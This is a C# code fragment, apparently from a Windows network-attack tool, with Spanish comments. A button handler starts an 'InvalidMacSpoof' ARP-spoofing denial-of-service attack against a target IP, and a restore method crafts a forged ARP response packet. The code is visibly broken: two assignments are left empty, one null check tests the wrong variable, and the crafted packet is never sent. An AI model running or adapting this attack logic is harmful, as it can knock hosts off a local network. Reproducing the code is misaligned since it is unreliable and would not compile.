private void btStartInvalidMacSpoof_Click(object sender, EventArgs e) { string error_InvalidIP = "Invalid IP Address"; string error_notIpv4 = "This attack only allow IPv4 addresses"; string error_macTargetNotFound = "The MAC address of the target has not been found"; string error_macSpoofedNotFound = "The MAC address has not been found"; IPAddress target = null; PhysicalAddress macTarget = null; IPAddress spoofedIp = null; PhysicalAddress macSpoofed = null; try { target = IPAddress.Parse(tbTargetSpoofedIpv4.Text); } catch { ShowMessage(error_InvalidIP, 1000, FormMessage.IconType.Error); return; } try { spoofedIp = IPAddress.Parse(tbIpSpoofedIpv4.Text); } catch { ShowMessage(error_InvalidIP, 1000, FormMessage.IconType.Error); return; } if ((target.AddressFamily != System.Net.Sockets.AddressFamily.InterNetwork) || (spoofedIp.AddressFamily != System.Net.Sockets.AddressFamily.InterNetwork)) { ShowMessage(error_notIpv4, 1000, FormMessage.IconType.Error); return; } // Cogemos la mac del target de los vecinos macTarget =; // En caso de que no la tengamos, le hacemos un ARP para coger su MAC if (macTarget == null) { string strMac = Utils.GetMacUsingARP(target.ToString()); if (string.IsNullOrEmpty(strMac)) { ShowMessage(error_macTargetNotFound, 1000, FormMessage.IconType.Error); return; } macTarget = PhysicalAddress.Parse(strMac.ToUpper()); } // Cogemos la mac del target de los vecinos macSpoofed =; // En caso de que no la tengamos, le hacemos un ARP para coger su MAC if (macTarget == null) { string strMac = Utils.GetMacUsingARP(spoofedIp.ToString()); if (string.IsNullOrEmpty(strMac)) { ShowMessage(error_macSpoofedNotFound, 1000, FormMessage.IconType.Error); return; } macSpoofed = PhysicalAddress.Parse(strMac.ToUpper()); } Data.InvalidMacSpoofAttackIpv4Attack invalidMacSpoofAttack = new InvalidMacSpoofAttackIpv4Attack( new Target(target, macTarget), new Target(spoofedIp, macSpoofed), AttackType.InvalidMacSpoofIpv4);; invalidMacSpoofAttack.Start(); AddAttackToListViewEx(invalidMacSpoofAttack); Program.LogThis("Performing a DoS attack to " + invalidMacSpoofAttack.t1.ip.ToString() + " with " + invalidMacSpoofAttack.t2.ip.ToString(), Logs.Log.LogType.DoS); }
public void ForceRestore(InvalidMacSpoofAttackIpv4Attack attack) { EthernetPacket ethernet; ethernet = new EthernetPacket(device.Interface.MacAddress, ((InvalidMacSpoofAttackIpv4Attack)attack).t1.mac, EthernetPacketType.Arp); ethernet.PayloadPacket = new ARPPacket(ARPOperation.Response, ((InvalidMacSpoofAttackIpv4Attack)attack).t1.mac, ((InvalidMacSpoofAttackIpv4Attack)attack).t1.ip, ((InvalidMacSpoofAttackIpv4Attack)attack).t2.mac, ((InvalidMacSpoofAttackIpv4Attack)attack).t2.ip);; }